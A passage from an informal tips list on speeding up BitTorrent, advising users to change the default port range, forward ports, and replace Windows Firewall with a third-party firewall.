4. Change the default port.

By default, BitTorrent uses a port 6881-6999. BitTorrent accounts for a lot of the total internet traffic (1/3), so isp’s like to limit the connection offered on the these ports. So, you should change these to another range. Good clients allow you to do this, just choose anything you like. If you’re behind a router, make sure you have the ports forwarded or UPnP enabled.

5. Disable Windows Firewall

It sucks. Windows Firewall hates P2P and often leads a life of it’s own. So disable it and get yourself a decent firewall, Kerio or Zone Alarm for example.

Last but not least… Buy a faster connection…